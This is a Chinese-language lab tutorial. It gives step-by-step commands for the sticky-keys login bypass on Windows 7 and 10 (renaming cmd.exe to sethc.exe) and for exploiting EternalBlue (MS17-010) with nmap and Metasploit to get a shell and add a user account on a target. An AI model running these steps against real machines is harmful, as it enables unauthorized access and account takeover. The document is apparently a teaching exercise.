Windows漏洞

823 阅读2分钟

Window 7沾滞键漏洞

概述

可以在登录界面使用粘滞键调出CMD命令提示符,直接修改账户密码

操作

  • 在Windows图标出现时,强制重启计算机,如果没有提示修复计算机,在出现Windows徽标时再次强制重启

image-20231031120151465

  • 进入修复页面

image-20231031124559366

  • 修复过程中出现任何解决方案,都点击取消

image-20231031124708894

  • 点击隐私声明文件链接,打开隐私声明记事本文件,选择另存为

image-20231031124938821

  • 根据弹出的文件选择框,找到系统盘符\Windows\System32中的sethc.exe文件和cmd.exe文件,并进行重命名,将sethc.exe更名为sethc1.exe,将cmd.exe更名为sethc.exe(注意,保存文件类型要选择所有文件才可看到到目标文件)

image-20231031125333739

  • 正常启动系统,按5次shift键,直接跳出cmd界面,使用命令修改密码后,则可以使用新密码登录系统

image-20231031125615597

Windows10沾滞键漏洞

步骤

  • 在开机动画完成前,重启计算机(一半2次),触发系统修复程序执行;

image-20240430092627293

image-20240430092642819

image-20240430092715706

image-20240430092734585

image-20240430092759633

  • 打开cmd

image-20240430093011306

  • 切换路径到系统命令目录
 cd /d c:\windows\system32
  • 将沾滞键程序名称更改为sethc1.exe
 rename sethc.exe sethc1.exe
  • 将cmd程序名称更改为sethc.exe
 rename cmd.exe sethc.exe

image-20240430093437781

  • 登录界面按5次shift触发cmd程序执行;

image-20240430093653406

永恒之蓝

概述

  • 利用Windows7系统文件共享服务(端口号为445)功能的漏洞,发起攻击;

实验

主机

  • 靶机:win7系统
  • 攻击主机:kali系统

步骤

  • 扫描网络环境主机信息,确定攻击目标
 nmap 网络地址/子网掩码

image-20240430160900484

  • 加载启动攻击工具msfconsole
 msfconsole

image-20240430161110269

  • 搜索永恒之蓝相关工具,永恒之蓝漏洞编号ms17_010
 search ms17_010

image-20240430161337961

  • 运行扫描模块,确定是否存在永恒之蓝漏洞
 #加载扫描模块use 3#确定扫描目标set rhosts 目标IP地址#运行扫描程序run

image-20240430161748391

  • 运行攻击模块,发起永恒之蓝漏洞攻击
 #加载攻击模块use 0#确定攻击目标set rhosts 目标IP地址#运行攻击程序run

image-20240430162022686

  • 执行shell,进行命令执行
 shell
  • 修改命令窗口编码为UTF-8(编码表编号65001)
 chcp 65001
  • 向靶机执行系统命令(创建新账户demo)
 net user demo 123456 /add

image-20240430162535992